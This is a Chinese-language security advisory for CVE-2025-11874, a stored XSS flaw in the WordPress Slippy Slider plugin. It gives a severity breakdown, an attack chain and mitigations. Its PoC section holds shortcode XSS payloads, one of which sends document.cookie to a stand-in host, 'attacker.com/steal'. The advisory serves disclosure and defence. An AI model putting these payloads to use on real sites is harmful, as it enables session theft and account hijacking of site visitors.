IPBUF安全漏洞报告
English
CVE-2025-11874 CVSS 5.4 中危

CVE-2025-11874 WordPress Slippy Slider插件存储型XSS漏洞

披露日期: 2025-11-11

漏洞信息

漏洞编号
CVE-2025-11874
漏洞类型
存储型跨站脚本(XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Slippy Slider - Responsive Touch Navigation Slider WordPress Plugin

相关标签

CVE-2025-11874WordPress插件漏洞存储型XSS跨站脚本Slippy Slidershortcode注入CVSS 5.4中危漏洞认证用户攻击WordPress安全

漏洞概述

CVE-2025-11874是WordPress Slippy Slider响应式触摸导航滑块插件中的一个存储型跨站脚本(XSS)漏洞。该插件在处理用户提供的shortcode属性时,存在严重的输入清理和输出转义不足问题。攻击者可以利用此漏洞在页面中注入任意JavaScript代码。由于该漏洞为存储型XSS,恶意脚本会被永久保存在服务器端,所有访问含有恶意代码页面的用户都会受到攻击影响。攻击者只需拥有WordPress网站的贡献者(contributor)级别权限即可实施攻击,这在一定程度上降低了攻击门槛。该漏洞影响插件2.0及以下所有版本。

技术细节

该漏洞存在于Slippy Slider插件的slippy-slider shortcode处理逻辑中。插件在处理shortcode属性时,未对用户输入进行充分的HTML实体转义或输入验证就直接输出到页面。当攻击者通过shortcode注入恶意JavaScript代码时,这些代码会被存储在WordPress数据库中,并在页面加载时执行。攻击者可以通过构造特定的shortcode属性值(如包含onerror、onload等事件处理器)来触发XSS。由于插件使用了不当的输出转义方法,攻击者能够绕过基本的防护措施。漏洞利用前提是攻击者具有至少贡献者级别的WordPress账号权限。

攻击链分析

STEP 1
步骤1
攻击者获取WordPress网站的贡献者(contributor)或更高权限账户
STEP 2
步骤2
攻击者创建或编辑文章/页面,插入包含恶意JavaScript的slippy-slider shortcode
STEP 3
步骤3
恶意shortcode被保存到WordPress数据库,由于插件未进行输入清理,恶意代码被存储
STEP 4
步骤4
当其他用户访问包含该shortcode的页面时,恶意JavaScript代码被浏览器执行
STEP 5
步骤5
攻击者通过XSS窃取用户会话cookie、劫持账户或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- WordPress Slippy Slider Stored XSS PoC --> <!-- Requires contributor-level access or higher --> <!-- Basic XSS payload via shortcode --> [slippy-slider onerror='alert(document.cookie)'] <!-- Image-based XSS payload --> [slippy-slider image='x' onerror='fetch("https://attacker.com/steal?c="+document.cookie)'] <!-- Event handler injection --> [slippy-slider title='<img src=x onerror=eval(atob("YWxlcnQoMSk="))>'] <!-- Stored XSS via shortcode attribute --> [slippy-slider custom_attr='" onfocus="alert(document.domain)" autofocus="']

影响范围

Slippy Slider Responsive Touch Navigation Slider Plugin <= 2.0

防御指南

临时缓解措施
临时缓解措施:在WordPress中移除或限制不受信任用户使用shortcode的能力;使用WordPress安全插件监控异常shortcode使用;考虑暂时禁用Slippy Slider插件直到官方补丁发布;实施严格的CSP策略限制内联脚本执行。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表